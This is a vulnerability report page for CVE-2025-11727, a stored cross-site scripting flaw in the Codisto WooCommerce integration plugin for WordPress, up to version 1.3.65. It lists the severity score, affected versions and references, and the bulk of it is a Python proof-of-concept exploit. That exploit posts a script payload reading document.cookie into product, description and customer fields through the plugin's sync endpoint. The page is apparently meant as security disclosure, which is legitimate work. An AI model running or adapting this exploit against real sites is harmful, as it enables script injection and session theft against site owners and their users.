Security Vulnerability Report
CVE-2025-11727 (CVSS 7.2 HIGH)

Published: 2025-12-04 05:16:23
Last Modified: 2026-04-15 00:35:42

Description

The Omnichannel for WooCommerce: Google, Amazon, eBay & Walmart Integration – Powered by Codisto plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the sync() function in all versions up to, and including, 1.3.65 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score: 7.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

Codisto Connect plugin (WordPress slug codistoconnect): all versions up to and including 1.3.65

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python

import requests
import json

# CVE-2025-11727 Stored XSS in Codisto WordPress Plugin
# Target: WordPress site with Codisto plugin <= 1.3.65
TARGET_URL = "http://target-wordpress-site.com"

# The sync endpoint where the plugin receives data from e-commerce platforms
SYNC_ENDPOINT = f"{TARGET_URL}/wp-content/plugins/codistoconnect/connect.php"

# Malicious XSS payload
XSS_PAYLOAD = '<script>alert(document.cookie)</script>'


def exploit_cve_2025_11727():
    """
    Exploit for CVE-2025-11727: Stored XSS in Codisto sync() function
    Attack vector: Send malicious payload through the sync function
    """
    headers = {
        'Content-Type': 'application/json',
        'User-Agent': 'Mozilla/5.0 (Codisto Sync Client)'
    }

    # Construct malicious sync request
    # The payload is injected into product data fields
    exploit_data = {
        'action': 'sync',
        'channel': 'amazon',
        'products': [
            {
                'sku': 'PROD-001',
                'name': f'Product Name{XSS_PAYLOAD}',
                'description': f'Description with{XSS_PAYLOAD}',
                'price': '99.99'
            }
        ],
        'orders': [
            {
                'order_id': 'ORD-12345',
                'customer_name': f'Customer{XSS_PAYLOAD}',
                'total': '150.00'
            }
        ]
    }

    try:
        response = requests.post(
            SYNC_ENDPOINT,
            headers=headers,
            json=exploit_data,
            timeout=30
        )
        print(f"[*] Response Status: {response.status_code}")
        if response.status_code == 200:
            print("[+] Payload sent successfully")
            print("[*] XSS payload stored in database")
            print("[*] Trigger when admin/user accesses affected pages")
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    print("CVE-2025-11727 Codisto Stored XSS Exploit")
    exploit_cve_2025_11727()

References

Weakness: CWE-79 (Cross-Site Scripting)
NVD status: Deferred

https://plugins.trac.wordpress.org/browser/codistoconnect/trunk/connect.php#L2101
https://plugins.trac.wordpress.org/browser/codistoconnect/trunk/connect.php#L2117
https://plugins.trac.wordpress.org/browser/codistoconnect/trunk/connect.php#L3063
https://plugins.trac.wordpress.org/browser/codistoconnect/trunk/connect.php#L3248
https://plugins.trac.wordpress.org/browser/codistoconnect/trunk/connect.php#L3249
https://www.wordfence.com/threat-intel/vulnerabilities/id/f4e3b796-af9a-4403-8d9a-1b56d7253b45?source=cve